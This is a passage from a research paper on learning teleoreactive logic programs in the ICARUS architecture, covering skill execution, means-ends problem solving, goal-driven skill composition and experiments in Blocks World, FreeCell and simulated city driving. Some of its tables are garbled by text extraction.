supports recursive definitions. For this reason, nonprimitive skills do not specify effects, Table 2: Primitive skills for the Blocks World domain. Each skill clause has a head that specifies its name and arguments, a set of typed variables, a single start condition, a set of effects, and a set of executable actions, each marked by an asterisk. |--------------------------|-----------|-------------------|----------------|--------|-----------------------------|-----------|-----------------------------|-----------|-----------------------------|---------------------------| which can depend on the number of levels of recursion, nor do they state requirements. However, the head of each complex skill refers to some concept that the skill aims to achieve, an assumption Reddy and Tadepalli (1997) have also made in their research on task decomposition. This connection between skills and concepts constitutes a key difference between the current approach and our earlier work on hierarchical skills in ICARUS (Choi et al., 2004; Langley & Rogers, 2004), and it figures centrally in the learning methods we describe later. Table 3 presents some recursive skills for the Blocks World, including two clauses for achieving the concept clear. Teleo-reactive logic programs are closely related to Nau et al.'s SHOP (1999) formalism for hierarchical task networks. This organizes knowledge into tasks, which serve as heads of clauses, and methods, which specify how to decompose tasks into subtasks. Primitive Table 3: Some nonprimitive skills for the Blocks World domain that involve recursive calls. Each skill clause has a head that specifies the goal it achieves, a set of typed variables, one or more start conditions, and a set of ordered subskills. Numbers after the head distinguish different clauses that achieve the same goal. <table> <thead> <tr> <th>Method</th> <th>Head</th> <th>Percepts</th> <th>Start</th> <th>Skills</th> </tr> </thead> </table> Methods describe the effects of basic actions, much like STRIPS operators. Each method also states its application conditions, which may involve predicates that are defined in logical axioms. In our framework, skill heads correspond to tasks, skill clauses are equivalent to methods, and concept definitions play the role of axioms. In this mapping, teleoreactive logic programs are a special class of hierarchical task networks in which nonprimitive tasks always map onto declarative goals and in which top-level goals and the preconditions of primitive methods are always single literals. We will see that these two assumptions play key roles in our approach to problem solving and learning. Note that every skill/task S can be expanded into one or more sequences of primitive skills. For each skill S in a teleoreactive logic program, if S has concept C as its head, then every expansion of S into such a sequence must, if executed successfully, produce a state in which C holds. This constraint is weaker than the standard assumption made for macro-operators (e.g., Iba, 1988); it does not guarantee that, once initiated, the sequence will achieve C, since other events may intervene or the agent may encounter states in which one of the primitive skills does not apply. However, if the sequence of primitive skills can be run to completion, then it will achieve the goal literal C. The approach to learning that we report later is designed to acquire programs with this characteristic, and we give arguments to this effect at the close of Section 4. 3. Interpreting Teleoreactive Logic Programs As their name suggests, teleoreactive logic programs are designed for reactive execution in a goal-driven manner, within a physical setting that changes over time. As with most reactive controllers, the associated performance element operates in discrete cycles, but it also involves more sophisticated processing than most such frameworks. On each decision cycle, ICARUS updates a perceptual buffer with descriptions of all objects that are visible in the environment. Each such percept specifies the object’s type, a unique identifier, and zero or more attributes. For example, in the Blocks World these would include structures like (block A xpos 5 ypos 1 width 1 height 1). In this paper, we emphasize domains in which the agent perceives the same objects on successive time steps but in which some attributes change value. However, we will also consider teleoreactive systems for domains like in-city driving (Choi et al., 2004) in which the agent perceives different objects as it moves through the environment. Once the interpreter has updated the perceptual buffer, it invokes an inference module that elaborates on the agent’s perceptions. This uses concept definitions to draw logical conclusions from the percepts, which it adds to a conceptual short-term memory. This dynamic store contains higher-level beliefs, cast as relational literals, that are instances of generic concepts. The inference module operates in a bottom-up, data-driven manner that starts from descriptions of perceived objects, such as \( \text{block A xpos 5 ypos 1 width 1 height 1} \) and \( \text{block B xpos 5 ypos 0 width 1 height 1} \), matches these against the conditions in concept definitions, and infers beliefs about primitive concepts like \( \text{on A B} \). These trigger inferences about higher-level concepts, such as \( \text{clear A} \), which in turn support additional beliefs like \( \text{unstackable A B} \). This process continues until the agent has added all beliefs that are implied by its perceptions and concept definitions.\(^1\) After the inference module has augmented the agent’s perceptions with high-level beliefs, the architecture’s execution module inspects this information to decide what actions to take in the environment. To this end, it also examines its current goal, which must be encoded as an instance of some known concept, and its skills, which tell it how to accomplish such goals. Unlike inference, the execution process proceeds in a top-down manner, finding paths through the skill hierarchy that terminate in primitive skills with executable actions. We define a skill path to be a chain of skill instances that starts from the agent’s goal and descends through the hierarchy along subskill links, unifying the arguments of each subskill consistently with those of its parent. Furthermore, the execution module only considers skill paths that are applicable. This holds if no concept instance that corresponds to a goal along the path is satisfied, if the requirements of the terminal (primitive) skill instance are satisfied, and if, for each skill instance in the path not executed on the previous cycle, the start condition is satisfied. This last constraint is necessary because skills may take many cycles to achieve their desired effects, making it important to distinguish between their initiation and their continuation. To this end, the module retains the path through the skill hierarchy selected on the previous time step, along with the variable bindings needed to reconstruct it. For example, imagine a situation in which the block C is on B, B is on A, and A is on the table, in which the goal is \( \text{clear A} \), and in which the agent knows the primitive skills in Table 2 and the recursive skills in Table 3. Further assume that this is the first cycle, so that no previous activities are under way. In this case, the only path through the skill hierarchy is \( \{(\text{clear A} 4), \{(\text{unstackable B A) 3}, \{(\text{clear B) 1), \{(\text{unstack C B)\}} \} \). Applying the primitive skill \( \text{unstack C B)\} \) produces a new situation that leads to new inferences, and in which the only applicable path is \( \{(\text{clear A) 4}, \{(\text{unstackable B A) 3}, \{(\text{hand-empty} 2), \{(\text{putdown C T}\}) \). This enables a third path on the next cycle, \( \{(\text{clear A) 4}, \{(\text{unstack B A)}\} \), which generates a state in which the agent’s goal is satisfied. Note that this process operates much like the proof procedure in Prolog, except that it involves activities that extend over time. --- 1. Although this mechanism reasons over structures similar to Horn clauses, its operation is closer in spirit to the elaboration process in Soar (Laird et al., 1986) than to the query-driven reasoning in Prolog. Figure 1: Organization of modules for reactive execution, problem solving, and skill learning, along with their inputs and outputs. The interpreter incorporates two preferences that provide a balance between reactivity and persistence. First, given a choice between two or more subskills, it selects the first one for which the corresponding concept instance is not satisfied. This bias supports reactive control, since the agent reconsiders previously completed subskills and, if unexpected events have undone their effects, reexecutes them to correct the situation. Second, given a choice between two or more applicable skill paths, it selects the one that shares the most elements from the start of the path executed on the previous cycle. This bias encourages the agent to keep executing a high-level skill it has started until it achieves the associated goal or becomes inapplicable. Most research on reactive execution emphasizes dynamic domains in which unexpected events can occur that fall outside the agent’s control. Domains like the Blocks World do not have this character, but this does not mean one cannot utilize a reactive controller to direct behavior (e.g., see Fern et al., 2004). Moreover, we have also demonstrated (Choi et al., 2004) the execution module’s operation in the domain of in-city driving, which requires reactive response to an environment that changes dynamically. Our framework is relevant to both types of settings. To summarize, ICarus’ procedure for interpreting telereactive logic programs relies on two interacting processes – conceptual inference and skill execution. On each cycle, the architecture perceives objects and infers instances of conceptual relations that they satisfy. After this, it starts from the current goal and uses these beliefs to check the conditions on skill instances to determine which paths are applicable, which in turn constrains the actions it executes. The environment changes, either in response to these actions or on its own, and the agent begins another inference-execution cycle. This looping continues until the concept that corresponds to the agent’s top-level goal is satisfied, when it halts. 4. Solving Problems and Learning Skills Although one can construct telereactive logic programs manually, this process is time consuming and prone to error. Here we report an approach to learning such programs whenever the agent encounters a problem or subproblem that its current skills do not cover. In such cases, the architecture attempts to solve the problem by composing its primitive skills in a way that achieves the goal. Typically, this problem-solving process requires search and, given limited computational resources, may fail. However, when the effort is successful the agent produces a trace of the solution in terms of component skills that achieved the problem’s goal. The system transforms this trace into new skill clauses, which it adds to memory for use on future tasks. Figure 1 depicts this overall organization. As in some earlier problem-solving architectures like PRODIGY (Minton, 1988) and Soar (Laird et al., 1986), problem solving and learning are tightly linked and both are driven by impasses. A key difference is that, in these systems, learning produces search-control knowledge that makes future problem solving more effective, whereas in our framework it generates telereactive logic programs that the agent uses in the environment. Nevertheless, there remain important similarities that we discuss later at more length. 4.1 Means-Ends Problem Solving As described earlier, the execution module selects skill clauses that should achieve the current goal and that have start conditions which match its current beliefs about the environment. Failure to retrieve such a clause produces an impasse that leads the architecture to invoke its problem-solving module. Table 4 presents pseudocode for the problem solver, which utilizes a variant of means-ends analysis (Newell & Simon, 1961) that chains backward from the goal. This process relies on a goal stack that stores both subgoals and skills that might accomplish them. The top-level goal is simply the lowest element on this stack. Despite our problem-solving method’s similarity to means-ends analysis, it differs from standard formulation in three important ways: - whenever the skill associated with the topmost goal on the stack becomes applicable, the system executes it in the environment, which leads to tight interleaving of problem solving and control; - both the start conditions of primitive skills (i.e., operators) and top-level goals must be cast as single relational literals, which may be defined concepts;\(^2\) - backward chaining can occur not only off the start condition of primitive skills but also off the definition of a concept, which means the single-literal assumption causes no loss of generality. As we will see shortly, the second and third of these assumptions play key roles in the mechanism for learning new skills, but we should first examine the operation of the problem-solving process itself. As Table 4 indicates, the problem solver pushes the current goal \(G\) onto the goal stack, then checks it on each execution cycle to determine whether it has been achieved. If so, then \(^2\) We currently define all concepts manually, but it would not be difficult to have the system define them automatically for operator preconditions and conjunctive goals. Table 4: Pseudocode for interleaving means-ends problem solving with skill execution. <table> <thead> <tr> <th>Solve(G)</th> </tr> </thead> <tbody> <tr> <td>Push the goal literal G onto the empty goal stack GS.</td> </tr> <tr> <td>On each cycle,</td> </tr> <tr> <td>If the top goal G of the goal stack GS is satisfied,</td> </tr> <tr> <td>Then pop GS.</td> </tr> <tr> <td>Else if the goal stack GS does not exceed the depth limit,</td> </tr> <tr> <td>Let S be the skill instances whose heads unify with G.</td> </tr> <tr> <td>If any applicable skill paths start from an instance in S,</td> </tr> <tr> <td>Then select one of these paths and execute it.</td> </tr> <tr> <td>Else let M be the set of primitive skill instances that</td> </tr> <tr> <td>have not already failed in which G is an effect.</td> </tr> <tr> <td>If the set M is nonempty,</td> </tr> <tr> <td>Then select a skill instance Q from M.</td> </tr> <tr> <td>Push the start condition C of Q onto goal stack GS.</td> </tr> <tr> <td>Else if G is a complex concept with the unsatisfied</td> </tr> <tr> <td>subconcepts H and with satisfied subconcepts F,</td> </tr> <tr> <td>Then if there is a subconcept I in H that has not yet failed,</td> </tr> <tr> <td>Then push I onto the goal stack GS.</td> </tr> <tr> <td>Else pop G from the goal stack GS.</td> </tr> <tr> <td>Store information about failure with G’s parent.</td> </tr> <tr> <td>Else pop G from the goal stack GS.</td> </tr> <tr> <td>Store information about failure with G’s parent.</td> </tr> </tbody> </table> the module pops the stack and focuses on G’s parent goal or, upon achieving the top-level goal, simply halts. If the current goal G is not satisfied, then the architecture retrieves all nonprimitive skills with heads that unify with G and, if any participate in applicable paths through the skill hierarchy, selects the first one found and executes it. This execution may require many cycles, but eventually it produces a new environmental state that either satisfies G or constitutes another impasse. If the problem solver cannot find any complex skills indexed by the goal G, it instead retrieves all primitive skills that produce G as one of their effects. The system then generates candidate instances of these skills by inserting known objects as their arguments. To select among these skill instances, it expands the instantiated start condition of each skill instance to determine how many of its primitive components are satisfied, then selects the one with the fewest literals unsatisfied in the current situation. If the candidates tie on this criterion, then it selects one at random. If the selected skill instance’s condition is met, the system executes the skill instance in the environment until it achieves the associated goal, which it then pops from the stack. If the condition is not satisfied, the architecture makes it the current goal by pushing it onto the stack. However, if the problem solver cannot find any skill clause that would achieve the current goal G, it uses G’s concept definition to decompose the goal into subgoals. If more than one subgoal is unsatisfied, the system selects one at random and calls the problem solver on it recursively, which makes it the current goal by pushing it onto the stack. This leads to chaining off the start condition of additional skills and/or the definitions of other concepts. Upon achieving a subgoal, the architecture pops the stack and, if other subconcepts remain unsatisfied, turns its attention to achieving them. Once all have been satisfied, this means the parent goal G has been achieved, so it pops the stack again and focuses on the parent. Of course, the problem-solving module must make decisions about which skills to select during skill chaining and the order in which it should tackle subconcepts during concept chaining. The system may well make the incorrect choice at any point, which can lead to failure on a given subgoal when no alternatives remain or when it reaches the maximum depth of the goal stack. In such cases, it pops the current goal, stores the failed candidate with its parent goals to avoid considering them in the future, and backtracks to consider other options. This strategy produces depth-first search through the problem space, which can require considerable time on some tasks. Figure 2 shows an example of the problem solver’s behavior on the Blocks World in a situation where block A is on the table, block B is on A, block C is on B, and the hand is empty. Upon being given the objective (clear A), the architecture looks for any executable skill with this goal as its head. When this fails, it looks for a skill that has the objective as one of its effects. In this case, invoking the primitive skill instance (unstack B A) would produce the desired result. However, this cannot yet be applied because its instantiated start condition, (unstackable B A), does not hold, so the system stores the skill instance with the initial goal and pushes this subgoal onto the stack. Next, the problem solver attempts to retrieve skills that would achieve (unstackable B A) but, because it has no such skills in memory, it resorts to chaining off the definition of unstackable. This involves three instantiated subconcepts – (clear), (on B A), and (hand-empty) – but only the first of these is unsatisfied, so the module pushes this onto the goal stack. In response, it considers skills that would produce this literal as an effect and retrieves the skill instance (unstack C B), which it stores with the current goal. In this case, the start condition of the selected skill, *(unstackable C B)*, already holds, so the architecture executes *(unstack C B)*, which alters the environment and causes the agent to infer *(clear B)* from its percepts. In response, it pops this goal from the stack and reconsiders its parent, *(unstackable B A)*. Unfortunately, this has not yet been achieved because executing the skill has caused the third of its component concept instances, *(hand-empty)*, to become false. Thus, the system pushes this onto the stack and, upon inspecting memory, retrieves the skill instance *(putdown C T)*, which it can and does execute. This second step achieves the subgoal *(hand-empty)*, which in turn lets the agent infer *(unstackable B A)*. Thus, the problem solver pops this element from the goal stack and executes the skill instance it had originally selected, *(unstack B A)*, in the new situation. Upon completion, the system perceives that the altered environment satisfies the top-level goal, *(clear A)*, which leads it to halt, since it has solved the problem. Both our textual description and the graph in Figure 2 represent the trace of successful problem solving: as noted earlier, finding such a solution may well involve search, but we have omitted missteps that require backtracking for the sake of clarity. Despite the clear evidence that humans often resort to means-ends analysis when they encounter novel problems (Newell & Simon, 1961), this approach to problem solving has been criticized in the AI planning community because it searches over a space of totally ordered plans. As a result, on problems for which the logical structure of a workable plan is only partially ordered, it can carry out extra work by considering alternative orderings that are effectively equivalent. However, the method also has clear advantages, such as low memory load because it must retain only the current stack rather than a partial plan. Moreover, it provides direct support for interleaving of problem solving and execution, which is desirable for agents that must act in their environment. Of course, executing a component skill before it has constructed a complete plan can lead the system into difficulty, since the agent cannot always backtrack in the physical world and can produce situations from which it cannot recover without starting over on the problem. In such cases, the problem solver stores the goal for which the executed skill caused trouble, along with everything below it in the stack. The system begins the problem again, this time avoiding the skill and selecting another option. If a different execution error occurs this time, the module again stores the problematic skill and its context, then starts over once more. In this way, the architecture continues to search the problem space until it achieves its top-level goal or exceeds the number of maximum allowed attempts.3 ### 4.2 Goal-Driven Composition of Skills Any method for learning teleoactive logic programs or similar structures must address three issues. First, it must determine the structure of the hierarchy that decomposes problems into subproblems. Second, the technique must identify when different clauses should have the same head and thus be considered in the same situations. Finally, it must infer the conditions under which to invoke each clause. The approach we describe here relies on results produced by the problem solver to answer these questions. Just as problem solving --- 3. The problem solver also starts over if it has not achieved the top-level objective within a given number of cycles. Jones and Langley (in press) report another variant of means-ends problem solving that uses a similar restart strategy but keeps no explicit record of previous failed paths. occurs whenever the system encounters an impasse, that is, a goal it cannot achieve by executing stored skills, so learning occurs whenever the system resolves an impasse by successful problem solving. The Icarus architecture shares this idea with earlier frameworks like Soar and Prodigy, although the details differ substantially. The response to the first issue is that hierarchical structure is determined by the subproblems handled during problem solving. As Figure 2 illustrates, this takes the form of a semilattice in which each subplan has a single root node. This structure follows directly from our assumptions that each primitive skill has one start condition and each goal is cast as a single literal. Because the problem solver chains backward off skill and concept definitions, the result is a hierarchical structure that suggests a new skill clause for each subgoal. Table 5 (a) presents the clauses that the system proposes based on the solution to the (clear A) problem, without specifying their heads or conditions. Figure 2 depicts the resulting hierarchical structure, using numbers to indicate the order in which the system generates each clause. The answer to the second question is that the head of a learned skill clause is the goal literal that the problem solver achieved for the subproblem that produced it. This follows from our assumption that the head of each clause in a teleo-reactive logic program specifies some concept that the clause will produce if executed. At first glance, this appears to confound skills with concepts, but another view is that it indexes skill clauses by the concepts they achieve. Table 5 (b) shows the clauses learned from the problem-solving trace in Figure 2 once the heads have been inserted. Note that this strategy leads directly to the creation of recursive skills whenever a conceptual predicate P is the goal and P also appears as a subgoal. In this example, because (clear A) is the top-level goal and (clear B) occurs as a subgoal, one of the clauses learned for clear is defined recursively, although this happens indirectly through unstackable. Clearly, introducing recursive statements can easily lead to overly general or even non-terminating programs. Our approach avoids the latter because the problem solver never considers a subgoal if it already occurs earlier in the goal stack; this ensures that subgoals which involve the same predicate always have different arguments. However, we still require some means to address the third issue of determining conditions on learned clauses that guards against the danger of overgeneralization. The response differs depending on whether the problem solver resolves an impasse by chaining backward on a primitive skill or by chaining on a concept definition. Suppose the agent achieves a subgoal G through skill chaining, say by first applying skill S_1 to satisfy the start condition for S_2 and executing the skill S_2, producing a clause with head G and ordered subskills S_1 and S_2. In this case, the start condition for the new clause is the same as that for S_1, since when S_1 is applicable, the successful completion of this skill will ensure the start condition for S_2, which in turn will achieve G. This differs from traditional methods for constructing macro-operators, which analytically combine the preconditions of the first operator and those preconditions of later operators it does not achieve. However, S_1 was either selected because it achieves S_2’s start condition or it was learned during its achievement, both of which mean that S_1’s start condition is sufficient for the composed skill. 4 4. If skill S_2 is executed without invoking another skill to meet its start condition, the method creates a new clause, with S_2 as its only subskill, that restates the original skill in a new form with G in its head. Table 5: Skill clauses for the Blocks World learned from the trace in Figure 2 (a) after hierarchical structure has been determined, (b) after the heads have been identified, and (c) after the start conditions have been inserted. Numbers after the heads indicate the order in which clauses are generated. <table> <thead> <tr> <th>(a)</th> <th>(head) 1</th> <th>(head) 3</th> </tr> </thead> <tbody> <tr> <td>:start</td> <td>&lt;conditions&gt;</td> <td>:start</td> </tr> </tbody> </table> <table> <thead> <tr> <th>(b)</th> <th>((clear ?B) 1</th> <th>((unstackable ?B ?A) 3</th> </tr> </thead> <tbody> <tr> <td>:start</td> <td>&lt;conditions&gt;</td> <td>:start</td> </tr> </tbody> </table> <table> <thead> <tr> <th>(c)</th> <th>((hand-empty) 2</th> <th>((clear ?A) 4</th> </tr> </thead> <tbody> <tr> <td>:start</td> <td>&lt;conditions&gt;</td> <td>:start</td> </tr> </tbody> </table> <table> <thead> <tr> <th>(b)</th> <th>((hand-empty) 2</th> <th>((clear ?A) 4</th> </tr> </thead> <tbody> <tr> <td>:start</td> <td>&lt;conditions&gt;</td> <td>:start</td> </tr> </tbody> </table> In contrast, suppose the agent achieves a goal concept $G$ through concept chaining by satisfying the subconcepts $G_{k+1}, \ldots, G_n$, in that order, while subconcepts $G_1, \ldots, G_k$ were true at the outset. In response, the system would construct a new skill clause with head $G$ and the ordered subskills $G_{k+1}, \ldots, G_n$, each of which the system already knew and used to achieve the associated subgoal or which it learned from the successful solution of one of the subproblems. In this case, the start condition for the new clause is the conjunction of subgoals that were already satisfied beforehand. This prevents execution of the learned clause when some of $G_1, \ldots, G_k$ are not satisfied, in which case the sequence $G_{k+1}, \ldots, G_n$ may not achieve the goal $G$. Table 6 gives pseudocode that summarizes both methods for determining the conditions on new clauses. Table 6: Pseudocode for creation of skill clauses through goal-driven composition. Learn(G) If the goal G involves skill chaining, Then let S1 and S2 be G’s first and second subskills. If subskill S1 is empty, Then create a new skill clause N with head G, with the head of S2 as the only subskill, and with the same start condition as S2. Return the literal for skill clause N. Else create a new skill clause N with head G, with the heads of S1 and S2 as ordered subskills, and with the same start condition as S1. Return the literal for skill clause N. Else if the goal G involves concept chaining, Then let C1, ..., Cn be G’s initially satisfied subconcepts. Let C_{k+1}, ..., Cn be G’s stored subskills. Create a new skill clause N with head G, with C_{k+1}, ..., Cn as ordered subskills, and with C1, ..., Ck as start conditions. Return the literal for skill clause N. Table 5 (c) presents the conditions learned for each of the skill clauses learned from the trace in Figure 2. Two of these (clauses 1 and 2) are trivial because they result from degenerate subproblems that the system solves by chaining off a single primitive operator. Another skill clause (3) is more interesting because it results from chaining off the concept definition for unstackable. This has the start conditions (on ?A ?B) and (hand-empty) because the subconcept instances (on A B) and (hand-empty) held at the outset.5 The final clause (4) is most intriguing because it results from using a learned clause (3) followed by the primitive skill instance (unstack B A). In this case, the start condition is the same as that for the first subskill clause (3). Upon initial inspection, the start conditions for clause 3 for achieving unstackable may appear overly general. However, recall that the skill clauses in a teleoactive logic program are interpreted not in isolation but as parts of chains through the skill hierarchy. The interpreter will not select a path for execution unless all conditions along the path from the top clause to the primitive skill are satisfied. This lets the learning method store very abstract conditions for new clauses with less danger of overgeneralization. On reflection, this scheme is the only one that makes sense for recursive control programs, since static preconditions cannot characterize such structures. Rather, the architecture must compute appropriate preconditions dynamically, depending on the depth of recursion. The Prolog-like interpreter used for skill selection provides this flexibility and guards against overly general behavior. We refer to the learning mechanism that embodies these answers as goal-driven composition. This process operates in a bottom-up fashion, with new skills being formed whenever a goal on the stack is achieved. The method is fully incremental, in that it learns from sin- --- 5. Although primitive skills have only one start condition, we do not currently place this constraint on learned clauses, as they are not used in problem solving and it makes acquired programs more readable. Table 7: Pseudocode for interleaved problem solving and execution extended to support goal-driven composition of skills. New steps are indicated in italic font. Solve(G) Push the goal literal G onto the empty goal stack GS. On each cycle, If the top goal G of the goal stack GS is satisfied, Then pop GS and let New be Learn(G). If G’s parent P involved skill chaining, Then store New as P’s first subskill Else if G’s parent P involved concept chaining, Then store New as P’s next subskill Else if the goal stack GS does not exceed the depth limit, Let S be the skill instances whose heads unify with G. If any applicable skill paths start from an instance in S, Then select one of these paths and execute it. Else let M be the set of primitive skill instances that have not already failed in which G is an effect. If the set M is nonempty, Then select a skill instance Q from M. Push the start condition C of Q onto goal stack GS. Store Q with goal G as its last subskill. Mark goal G as involving skill chaining. Else if G is a complex concept with the unsatisfied subconcepts H and with satisfied subconcepts F, Then if there is a subconcept I in H that has not yet failed, Then push I onto the goal stack GS. Store F with G as its initially true subconcepts. Mark goal G as involving concept chaining. Else pop G from the goal stack GS. Store information about failure with G’s parent. Else pop G from the goal stack GS. Store information about failure with G’s parent. Single training cases, and it is interleaved with problem solving and execution. The technique shares this characteristic with analytical methods for learning from problem solving, such as those found in Soar and PRODIGY. But unlike these methods, it learns hierarchical skills that decompose problems into subproblems, and, unlike most methods for forming macro-operators, it acquires disjunctive and recursive skills. Moreover, learning is cumulative in that skills learned from one problem are available for use on later tasks. Taken together, these features make goal-driven composition a simple yet powerful approach to learning logic programs for reactive control. Nor is the method limited to working with means-ends analysis; it should operate over traces of any planner that chains backward from a goal. The architecture’s means-ends module must retain certain information during problem solving to support the composition of new skill clauses. Table 7 presents expanded pseudocode that specifies this information and when the system stores it. The form and content is similar to that recorded in Veloso and Carbonell’s (1993) approach to derivational analogy. The key difference is that their system stores details about subgoals, operators, and preconditions in specific cases that drive future problem solving, whereas our approach transforms these instances into generalized hierarchical structures for teleoreactive control. We should clarify that the current implementation invokes a learned clause only when it is applicable in the current situation, so the problem solver never chains off its start conditions. Mooney (1989) incorporated a similar constraint into his work on learning macro-operators to avoid the utility problem (Minton, 1990), in which learned knowledge reduces search but leads to slower behavior. However, we have extended his idea to cover cases in which learned skills can solve subproblems, which supports greater transfer across tasks. In our framework, this assumption means that clauses learned from skill chaining have a left-branching structure, with the second subskill being primitive. In Section 2, we stated that every skill clause in a teleoactive logic program can be expanded into one or more sequences of primitive skills, and that each sequence, if executed legally, will produce a state that satisfies the clause’s head concept. Here we argue that goal-driven composition learns sets of skill clauses for which this condition holds. As in most research on planning, we assume that the preconditions and effects of primitive skills are accurate, and also that no external forces interfere. First consider a clause with the head $H$ that has been created as the result of successful chaining off a primitive skill. This learned clause is guaranteed to achieve the goal concept $H$ because $H$ must be an effect of its final subskill or the chaining would never have occurred. Now consider a clause with the head $H$ that has been created as the result of successful chaining off a conjunctive definition of the concept $H$. This clause describes a situation in which some subconcepts of $H$ hold but others must still be achieved to make $H$ true. Some subconcepts may become unsatisfied in the process and need to be reaunched, but the ordering on subgoals found during problem solving worked for the particular objects involved, and replacing constants with variables will not affect the result. Thus, if the clause’s start conditions are satisfied, achieving the subconcepts in the specified order will achieve $H$. Remember that our method does not guarantee, like those for learning macro-operators, that a given clause expansion will run to completion. Whether this occurs in a given domain is an empirical question, to which we now turn. 5. Experimental Studies of Learning As previously reported (Choi & Langley, 2005), the means-ends problem solving and learning mechanisms just described construct properly organized teleoactive logic programs. After learning, the agent can simply retrieve and execute the acquired programs to solve similar problems without falling back to problem solving. Here we report promising results from more systematic and extensive experiments. The first two studies involve inherently recursive but nondynamic domains, whereas the third involves a dynamic driving task. 5.1 Blocks World The Blocks World involves an infinitely large table with cubical blocks, along with a manipulator that can grasp, lift, carry, and ungrasp one block at a time. In this domain, we wrote an initial program with nine concepts and four primitive skills. Additionally, we provided a concept for each of four different goals. Theoretically, this knowledge is sufficient to solve --- 6. These concerned achieving situations in which a given block is clear, one block is on another, one block is on another and a third block is on the table, and three blocks are arranged in a tower. any problem in the domain, but the extensive search required would make it intractable to solve tasks with many blocks using only basic knowledge. In fact, only 20 blocks are enough to make the system search for half an hour. Therefore, we wanted the system to learn teleoreactive logic programs that it could execute recursively to solve problems with arbitrary complexity. We have already discussed a recursive program acquired from one training problem, which requires clearing the lowest object in a stack of three blocks, but many other tasks are possible. To establish that the learned programs actually help the architecture to solve more complex problems, we ran an experiment that compared the learning and non-learning versions. We presented the system with six ten-problem sets of increasing complexity, one after another. More specifically, we used sets of randomly generated problems with 5, 10, 15, 20, 25, and 30 blocks. If the goal-driven composition mechanism is effective, then it should produce noticeable benefits in harder tasks when the learning is active. We carried out 200 runs with different randomized orders within levels of task difficulty. In each case, we let the system run a maximum of 50 decision cycles before starting over on a problem and attempt a task at most five times before it gave up. For this domain, we set the maximum depth of the goal stack used in problem solving to eight. Figure 3 displays the number of execution cycles and the CPU time required for both conditions, which shows a strong benefits from learning. With number of cycles as the performance measure, we see a systematic decrease as the system gains more experience. Every tenth problem introduces five additional objects, but the learning system requires no extra effort to solve them. The architecture has constructed general programs that let it achieve familiar goals for arbitrary numbers of blocks without resorting to deliberative problem solving. Inspection reveals that it acquires the nonprimitive skill clauses in Table 3, as well as additional ones that make recursive calls. In Table 8: Aggregate scaling results for the Blocks World. <table> <thead> <tr> <th>Blocks</th> <th>Learning</th> <th>No Learning</th> </tr> </thead> <tbody> <tr> <td></td> <td>cycles</td> <td>CPU</td> </tr> <tr> <td>5</td> <td>21.25</td> <td>4.03</td> </tr> <tr> <td>10</td> <td>13.61</td> <td>6.90</td> </tr> <tr> <td>15</td> <td>11.22</td> <td>11.13</td> </tr> <tr> <td>20</td> <td>9.76</td> <td>16.09</td> </tr> <tr> <td>25</td> <td>11.04</td> <td>27.41</td> </tr> <tr> <td>30</td> <td>11.67</td> <td>40.85</td> </tr> </tbody> </table> contrast, the nonlearning system requires more decision cycles on harder problems, although this levels off later in the curve, as the problem solver gives up on very difficult tasks. The results for solution time show similar benefits, with the learning condition substantially outperforming the condition without. However, the figure also indicates that even the learning version slows down somewhat as it encounters problems with more blocks. Analysis of individual runs suggests this results from the increased cost of matching against objects in the environment, which is required in both the learning and nonlearning conditions. This poses an issue, not for our approach to skill construction but to our architectural framework, so it deserves attention in future research. Table 8 shows the average results for each level of problem complexity, including the probability that the system can solve a problem within the allowed number of cycles and attempts. In addition to presenting the first two measures at more aggregate levels, it also reveals that, without learning, the chances of finding a solution decrease with the number of blocks in the problem. Letting the system carry out more search would improve these scores, but only at the cost of increasing the number of cycles and CPU time needed to solve the more difficult problems. 5.2 FreeCell Solitaire FreeCell is a solitaire game with eight columns of stacked cards, all face up and visible to the player, that has been used in AI planning competitions (Bacchus, 2001). There are four free cells, which can hold any single card at a time, and four home cells that correspond to the four different suits. The goal is to move all the cards on the eight columns to the home cells for their suits in ascending order. The player can move only the cards on the top of the eight columns and the ones in the free cells. Each card can be moved to a free cell, to the proper home cell, or to an empty column. In addition, the player can move a card to a column whose top card has the next number and a different color. As in the Blocks World, we provided a simulated environment that allows legal moves and updates the agent’s perceptions. For this domain, we provided the architecture with an initial program which involves 24 concepts and 12 primitive skills that should, in principle, let it solve any initial configuration with a feasible solution path. (Most but not all FreeCell problems are solvable.) However, the agent may find a solution only after a significant amount of search using its means-ends problem solver. Again we desired the system to learn teleoreactive logic programs that it can execute on complex FreeCell problems with little or no search. In this case, we presented tasks as a sequence of five 20-problem sets with 8, 12, 16, 20, and 24 cards. On each problem, we let the system run at most 1000 decision cycles before starting over, attempt the task no more than five times before halting, and create goal stacks up to 30 in depth. We ran both the learning and nonlearning versions on 300 sets of randomly generated problems and averaged the results. Figure 4 shows the number of cycles and the CPU time required to solve tasks as a function of the number of problems encountered. In the learning condition, the system rapidly acquired recursive FreeCell programs that reduced considerably the influence of task difficulty as compared to the nonlearning version. As before, the benefits are reflected in both the number of cycles needed to solve problems and in the CPU time. However, increasing the number of cards in this domain can alter the structure of solutions, so the learning system continued to invoke means-ends problem solving in later portions of the curve. For instance, situations with 20 cards often require column-to-column moves that do not appear in simpler tasks, which caused comparable behavior in the two conditions at this complexity level. However, the learning system took advantage of this experience to handle 24-card problems with much less effort. Learning also increased the probability of solution (about 80 percent) over the nonlearning version (around 50 percent) on these tasks. 5.3 In-City Driving The in-city driving domain involves a medium-fidelity simulation of a downtown driving environment. The city has several square blocks with buildings and sidewalks, street segments, and intersections. Each street segment includes a yellow center line and white dotted lane Figure 5: The total number of cycles required to solve a particular right-turn task along with the planning and execution times, as a function of the number of trials. Each learning curve shows the mean computed over ten sets of trials and 95 percent confidence intervals. lines, and it has its own speed limit the agent should observe. Buildings on each block have unique addresses, to help the agent navigate through the city easily and to allow specific tasks like package deliveries. A typical city configuration we used has nine blocks, bounded by four vertical streets and four horizontal streets with four lanes each. For this domain, we provided the system 41 concepts and 19 primitive skills. With the basic knowledge, the agent can describe its current situation at multiple levels of abstraction and perform actions for accelerating, decelerating, and steering left or right at realistic angles. Thus, it can operate a vehicle, but driving safely in a city environment is a totally different story. The agent must still learn how to stay aligned and centered within lane lines, change lanes, increase or decrease speed for turns, and stop for parking. To encourage such learning, we provided the agent with the task of moving to a destination on a different street segment that requires a right turn. To achieve this task, it resorted to problem solving, which found a solution path that involved changing to the rightmost lane, staying aligned and centered until the intersection, steering right to place the car in the target segment, and finally aligning and centering in the new lane. We recorded the total number of cycles to solve this task, along with its breakdown into the cycles devoted to planning and to execution, as a function of the number of trials. Figure 5 shows the learning curve that results from averaging over ten different sets of trials. As the system accumulates knowledge about the driving task, its planning effort effectively disappears, which leads to an overall reduction in the 